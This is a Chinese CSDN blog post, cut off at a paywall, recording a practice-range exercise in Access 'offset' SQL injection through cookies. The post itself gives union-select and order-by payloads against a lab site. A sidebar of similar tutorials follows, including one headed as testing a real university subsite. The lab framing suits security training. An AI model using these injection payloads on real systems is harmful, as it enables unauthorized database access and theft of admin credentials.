偏移注入靶场练习

最新推荐文章于 2022-07-08 22:26:28 发布
最新推荐文章于 2022-07-08 22:26:28 发布
阅读量735 收藏
点赞数
分类专栏: 渗透测试 文章标签: 渗透测试
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_60777183/article/details/120055501
版权
本文介绍了在靶场环境中进行SQL注入实战的过程,通过调整SQL语句,逐步发现注入点和隐藏字段。通过二分法确定表的字段数,并利用数字后缀法找出所有隐藏的注入点,最终揭示了admin表的部分信息。
摘要由CSDN通过智能技术生成

document.cookie= “id=”+escape(“171 union select 1,2,3,4,5,6,7,8,9,admin. from admin”)
提示数据库报错,
一直减到:
document.cookie= “id=”+escape(“171 union select admin. from admin”)
仍然提示数据库报错。
说明注入点查询的表的字段数小于admin表中的字段数。

ps:漏洞不可能只存在一个,因为开发者开发思路是一样的,一般来说相似的漏洞会在同一个网站频繁出现。
在靶场产品中心的某个产品页面试下:
http://kypt8004.ia.aqlab.cn/ProductShow.asp?ID=105
document.cookie=”id=”+escape(“105 order by 1”) 页面正常
document.cookie=”id=”+escape(“105 order by 100”) 找不到此产品!
通过二分法不停找,发现26个字段。
document.cookie=”id=”+escape(“105 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26 from admin”)
可见3,5,7为注入点。
其实25也是注入点,隐藏在图片里。
那么,怎样才能把所有隐藏点都找到呢?
每个数字后面加一串容易辨识的长数

最低0.47元/天 解锁文章
回声777
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
Access偏移注入靶场作业
weixin_45540609的博客
04-19 353
因为ID=104和ID=105-1时页面显示内容一样,因此判断存在sql注入 不断order by 1,2,3,······,26,到27时,页面无法正常显示,则说明字段有26个 把cookie的名称设置为ID,值设置成105,把url栏里面?ID=105删除,刷新,则说明cookie优先级高于get 把cookie值设置成105 union select 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2.
[zkaq靶场]SQL注入--access数据库-偏移注入
wwxxee
05-09 396
Access注入偏移注入 适用场景: 当使用select * from admin与select admin.* from admin等价时,就可以在不知道字段名的情况下获取数据。 union select 1,2,3,admin.* ,4,5,6 from admin 通过偏移admin.*的位置来获得不同字段的数据,这时就不需要知道字段名了。 靶场 该处的sql注入为access数据库-cookie注入的漏洞点。 偏移注入的漏洞点在: 由于admin表里新增了一个字段,无法通过爆破得出,所以在此处
access偏移注入
baynk的博客
06-07 3043
记录总结偏移注入的使用方法。 为什么要用偏移注入 偏移注入是access比较独有的一种注入手段,很有特点(人品。。)的注入方式,一般用于在猜出了表名但是没有猜出列名的情况下使用。 偏移注入的使用 目前猜测出了表名,但是怎么都猜不出列名,使用联合查询法来进行偏移注入。 接下来测出偏移量,其实这个偏移量就是admin这张表的列的个数。直接将22改成*号,测试是否回显正常,不正常就一直往前减,一...
渗透测试基础-Access数据库之偏移注入
weixin_45488495的博客
04-12 419
渗透测试基础-Access数据库之偏移注入偏移注入漏洞总结 只为对所学知识做一个简单的梳理,如果有表达存在问题的地方,麻烦帮忙指认出来。我们一起为了遇见更好的自己而努力????! 偏移注入 偏移注入的应用场景是,当这个地方我们有了表名,但是字段名始终弄不来的使用方法。 先来了解一些数据库小知识 select * from school 代表的是查询school表里面的所有数据(如图) 但其实我们可以换其他的写法,来达到相同的查询效果 select school.* from school 所以咱们这里的
16、注入篇--偏移注入(Access)
WX公众号-小白学安全
04-10 448
偏移注入也称移位溢出 使用场景 知道表名,不知道字段名 注入点的字段数要大于需要查询的表名字段数 注入流程 order by 判断字段数 猜测表名 and exists(select * from 表名) 开始偏移注入 注意: select username,password from admin ===>select * from admin ===>select admin.* from admin 库名.表名.字段名 靶场 1、进入靶场,观察ID进行了传递参数,探测id是否可以注
Access偏移注入利用-01
最新发布
09-15
Access偏移注入利用-01
Access偏移注入
10-02
### Access偏移注入详解 #### 一、Access偏移注入概念与原理 Access偏移注入是一种针对Microsoft Access数据库的特殊SQL注入技术。这种技术利用了Access数据库在处理SQL语句时的一些特性,允许攻击者通过构造特殊...
双极性偏移
11-15
双极性偏移码是一种在数字信号处理中用于表示双极性模拟信号的编码方式,特别是在模数转换(A/D转换)过程中应用广泛。在上述的12位A/D转换器示例中,输入的模拟信号范围是-5V到+5V,对应的数字输出范围则是0到4095...
偏移计算工具
11-06
偏移计算工具,第一个编辑框填写基质,其余全部填写对应偏移即可!
pppp_lisp偏移_批量偏移cad_
10-04
标题“pppp_lisp偏移_批量偏移cad_”所指的内容是关于AutoCAD中的一个LISP程序,用于批量对图形对象进行偏移操作。LISP(List Processor)是AutoCAD内置的一种脚本语言,它允许用户自定义命令、创建宏以及执行各种...
cracer安全学院内部练习靶场
04-13
这是最新大佬分享出来的靶机下载地址,是最新的cracer大佬的靶机地址,解压密码在压缩包内打开即可看到解压密码。希望大家能够希望
适用于ACCESS和MySQL数据库的偏移注入
qq_42097777的博客
04-01 452
## 注入的两个条件:1.用户可以控制传参,2.用户输入的语句被带入数据库进行查询,偏移注入同样如此 # 偏移注入还要用到"table.*" 他的意思是代表了表里的所有字段 ###运用场景是:权限不足无法获取系统表内的信息,和工具无法查出字段 先判断是否有注入点,靶场第一题,用url传参被拒绝,采用cookie进行传参 1.利用and1=1 显示正常, and 1=2 显示错误页面。证明有...
Access偏移注入检测北大分站
0ffs3t
11-30 1450
Access偏移注入检测北大分站 2011-10-01 22:25 Access偏移注入检测北大分站 作者:莫良 来自BHST.org 0x00 大清早朋友丢来一站要我看,反正蛋疼厉害,就帮帮他呗。一看,哇靠北大分站,上跳板,我们来给他安全检测一番.具体没什么技术含量,高手飘过。 0x01 简单在首页试了几个可能存在注入的链接都失
Access数据库注入偏移注入
seek_2022的博客
05-02 2548
文章目录一、偏移注入使用场景二、必要的SQL知识补充(一)admin.*是什么意思?(二)联合查询的字段数问题(三)access如何查询指定数据?三、靶场实战(一)判断是否存在cookie注入(二)爆破表名(三)判断当前页面显错位(四)查询admin表字段数(五)偏移注入查询flag 一、偏移注入使用场景 在SQL注入的时候会遇到一些无法查询列名的问题,比如系统自带数据库的权限不够而无法访问系统自带库。 当你猜到表名无法猜到字段名的情况下,我们可以使用偏移注入来查询那张表里面的数据。像Sqlmap之类的工
靶场(2)
HJWYYQX的博客
06-08 685
SMB信息泄露 首先,先查看攻击机IP 然后,通过扫描得到靶机IP,并且可以知道靶机开放了SMB服务。 有SMB服务,我们可以 尝试使用空口令登录(提示输入密码直接空密码) 发现一个打印驱动、一个共享文件夹share$和一个空链接。 ls查看共享的文件夹。share$里发现许多敏感文件,用get下载下来到本地查看,其中deet.txt泄露了一个密码12345; 然后在共享文件夹里边还有...
[4] SQL 注入(七月最佳)
Debroon
12-02 1913
SQL 注入十分普遍,新闻➡️《报告称 超 6 成 Web应用程序攻击来自SQL注入》。 如上所述,SQL注入攻击 或 SQLi 是一种通过将恶意SQL语句插入其输入字段以供执行来利用SQL语句的基础漏洞的方法。 起于 1998 年一名叫 Rfp 的黑客发表的一篇文章。 从那时起,TA主要针对零售商和...
靶场(3)
HJWYYQX的博客
06-15 286
FTP服务后门 同样开始用netdiscover发现靶机ip后,用nmap探测开启的端口或服务。 发现开启了ssh,http和ftp这三个服务。 我们发现了ftp的版本号,我们可以使用seachsploit来查看对应的版本该服务有没有可利用的漏洞。 发现了利用漏洞,并且列出了集成利用方式(Metasploit)和利用代码位置(15662.txt) 接下来使用Metasploit进行溢出(...
sql 时间函数大全
热门推荐
04-24 1万+
1.        当前系统日期、时间    select getdate()2. dateadd  在向指定日期加上一段时间的基础上,返回新的 datetime 值  例如:向日期加上2天  select dateadd(day,2,2004-10-15)  --返回:2004-10-17 00:00:00.0003. datediff 返回跨两个指定日期的日期和时间边界数。  se
【SQL注入】cookie注入:原理、步骤、示例
07-08 4674
【SQL-cookie注入
移位溢注技术详解:告别偏移注入的人品依赖
偏移注入的基本公式是`num-d=*`,其中`num`代表查询中的一个特定数字,`d`表示查询语法中递减部分的长度,而`*`则代表表的列数。然而,这种方法往往依赖于大量的尝试和运气,过程较为繁琐。 移位溢注技术则是对偏移...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值